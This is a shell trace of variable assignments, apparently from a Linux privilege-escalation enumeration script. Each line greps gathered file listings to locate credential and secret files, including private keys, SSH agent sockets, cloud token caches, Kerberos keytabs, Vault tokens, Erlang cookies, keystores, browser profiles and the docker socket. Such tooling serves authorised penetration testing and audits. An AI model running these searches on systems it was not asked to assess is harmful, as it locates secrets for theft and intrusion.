+ PSTORAGE_CERTSB4=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70)
+ PSTORAGE_CERTSBIN=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70)
+ PSTORAGE_CERTSCLIENT=$(echo -e 
"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70)
+ PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70)
+ PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^$GREPHOMESEARCH|^/usr" | grep -E "ssh.*config$" | sort | uniq | head -n 70)
+ PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E 
"^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70)
+ PSTORAGE_KERBEROS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$" | sort | uniq | head -n 70)
+ PSTORAGE_KIBANA=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70)
+ PSTORAGE_KNOCKD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70)
+ PSTORAGE_LOGSTASH=$(echo -e 
"$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "logstash$" | sort | uniq | head -n 70)
+ PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70)
+ PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70)
+ PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | 
grep -E "\.vault-token$" | sort | uniq | head -n 70)
+ PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "couchdb$" | sort | uniq | head -n 70)
+ PSTORAGE_REDIS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "redis\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_MOSQUITTO=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E 
"^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "neo4j$" | sort | uniq | head -n 70)
+ PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70)
+ PSTORAGE_ERLANG=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70)
+ PSTORAGE_GMV_AUTH=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_IPSEC=$(echo -e 
"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.irssi$" | sort | uniq | head -n 70)
+ PSTORAGE_KEYRING=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70)
+ PSTORAGE_FILEZILLA=$(echo -e 
"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "filelliza$|filezilla\.xml$" | sort | uniq | head -n 70)
+ PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70)
+ PSTORAGE_SPLUNK=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "passwd$" | sort | uniq | head -n 70)
+ PSTORAGE_GITLAB=$(echo -e 
"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '/lib' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70)
+ PSTORAGE_PGP_GPG=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E 'README.gnupg' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70)
+ PSTORAGE_CACHE_VI=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70)
+ PSTORAGE_DOCKER=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E 
"^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70)
+ PSTORAGE_FIREFOX=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^$GREPHOMESEARCH" | grep -E "\.mozilla$" | sort | uniq | head -n 70)
+ PSTORAGE_CHROME=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^$GREPHOMESEARCH" | grep -E "google-chrome$" | sort | uniq | head -n 70)
+ PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_FASTCGI=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E 
"^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "fastcgi_params$" | sort | uniq | head -n 70)
